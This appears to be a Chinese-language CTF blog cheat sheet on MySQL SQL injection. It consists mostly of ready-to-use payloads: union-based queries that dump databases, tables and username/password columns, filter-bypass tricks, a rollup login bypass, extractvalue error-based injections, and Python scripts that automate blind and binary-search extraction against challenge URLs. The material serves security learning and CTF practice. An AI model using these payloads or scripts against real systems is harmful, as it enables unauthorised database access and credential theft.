首页 WEB

# MYSQL

mysql基础语句
  • 测试多少列
1' order by 4#
  • 爆库
-1' union select 1,database(),3#
  • 爆表
-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#
  • 爆字段
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'#
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#
  • 爆字段值
-1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#
# 字符型注入
#变 --+
  • 测试多少列
1' order by 4--+
  • 爆库
=1' union select 1,database(),3--+
  • 爆表
=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
  • 爆字段
=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'--+
  • 爆字段值
=-1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1--+
+++
# 空格绕过
/**/
()
`
tap
两个空格
%0a
# = 绕过
like
# 盲注
import requests
 
url = 'http://53aab0c2-b451-4910-a1e0-f15fd9e64b2a.challenge.ctf.show:8080/index.php?id=-1/**/or/**/'
name = ''
 
# 循环 45 次 (循环次数按照返回的字符串长度自定义)
for i in range(1, 45):
    # 获取当前使用的数据库
    # payload = 'ascii(substr(database()from/**/%d/**/for/**/1))=%d'
    # 获取当前数据库的所有表
    # payload = 'ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%d/**/for/**/1))=%d'
    # 获取 flag 表的字段
    # payload = 'ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%d/**/for/**/1))=%d'
    # 获取 flag 表的数据
    payload = 'ascii(substr((select/**/flag/**/from/**/flag)from/**/%d/**/for/**/1))=%d'
    count = 0
    print('正在获取第 %d 个字符' % i)
    # 截取 SQL 查询结果的每个字符,并判断字符内容
    for j in range(31, 128):
        result = requests.get(url + payload % (i, j))
 
        if 'If' in result.text:
            name += chr(j)
            print('数据库名/表名/字段名/数据: %s' % name)
            break
 
        # 如果某个字符不存在,则停止程序
        count += 1
        if count >= (128 - 31):
            exit()
# 二分法
import requests
url = '<http://1.14.97.218:22233/search.php?'>
flag = ''
for i in range(140, 200):
    left = 32
    right = 127
    mid = (left + right) // 2
 while left < right:
 # payload = 'id=1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),{},1))>{})^1&search=%E6%9F%A5%E8%AF%A2'.format(i, mid)
 # payload = 'id=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=\\'emails\\')),{},1))>{})^1&search=%E6%9F%A5%E8%AF%A2'.format(i, mid)
        payload = 'id=1^(ascii(substr((select(group_concat(email_id))from(emails)),{},1))>{})^1&search=%E6%9F%A5%E8%AF%A2'.format(i, mid)
        r = requests.get(url+payload)
 if 'Dumb' in r.text:
            left = mid + 1
 else:
            right = mid
        mid = (left + right) // 2
    flag += chr(mid)
 print(flag)
# 例题
# [CISCN 2019 华北 Day2] Web1
1 和 2 有回显
# IF (expr,1,2)		# 如果表达式 expr 结果为 True 返回 1,否则返回 2;
id=if(length((select(database())))>0,1,2)
# 回显 Hello, glzjin wants a girlfriend.
id=if(length((select(database())))<0,1,2)
# 回显 Do you want to be my girlfriend?
#!/usr/bin/env  python3
# -*- encoding: UTF-8 -*-
import requests
import string
import time
class Sqlinject():
    def __init__(self, url, keyword=None, len=127):
        self._len = len
        self._url = url
        self._keyword = keyword
        self._length = 0
        self._flag = ''
    # 爆破长度
    def getlength(self, name, payload=None):
        self._payload = payload
        for len in range(self._len):
            payload = self._payload % len
            req = requests.post(self._url, data={'id': payload})
            if self._keyword in req.text:
                self._length = len
                print('%s_Length = %d.' % (name, self._length))
                break
    # 爆破 flag
    def getflag(self, payload=None):
        self._payload = payload
        for len in range(1, self._length + 1):
            min = 33
            max = 126
            while (max > min):
                mid = int((min + max + 1) / 2)
                payload = self._payload % (len, mid)
                req = requests.post(self._url, data={'id': payload})
                if self._keyword in req.text:
                    min = mid
                else:
                    max = mid - 1
                time.sleep(0.1)
            self._flag += chr(max)
            print('flag:%s' % self._flag)
if __name__ == '__main__':
    urls = 'http://1.14.71.254:28890/index.php'
    keywords = 'Hello, glzjin wants a girlfriend.'
    strs = string.ascii_letters + string.digits + string.printable
    inject = Sqlinject(urls, keywords)
    # getlength (name, payload) 两个参数 一个是需要爆破位置的名字自定义就行只做打印显示用,另外一个是 payload 使用 双引号包裹,除了 length 之外其他方法只需要 payload 和需要被改变的位置
    inject.getlength("flaglen", "if(length((select(flag)from(flag)))=%d,1,0)")
    inject.getflag("if((ascii(substr((select(flag)from(flag)),%d,1)))>=%d,1,0)")
# rollup
admin'/**/or/**/1=1/**/group/**/by/**/password/**/with/**/rollup/**/#
# 报错注入
extractvalue()
# 例题
# [SWPUCTF 2021 新生赛] error
  • 爆库
1' and extractvalue(1,concat(0x7e,database())) #
  • 爆表数
1' and extractvalue(1,concat(0x7e,(select count(table_name) from information_schema.tables where table_schema=database()))) #
  • 爆表名
id=1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1))) #
  • 爆字段
1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='test_tb' limit 0,1))) #
  • 爆字段值
1' and extractvalue(1,concat(0x7e,(select flag from test_tb)))#
NSSCTF{b4514a59-97bf-49a6-b899-
1' and extractvalue(1,concat(0x7e,substr((select flag from test_tb),30,30),0x7e))%23
9-efbf019869a5}
1' and extractvalue(1,concat(0x7e,substr((select flag from test_tb),1,33),0x7e))%23
NSSCTF{b4514a59-97bf-49a6-b899-
 更新于   阅读次数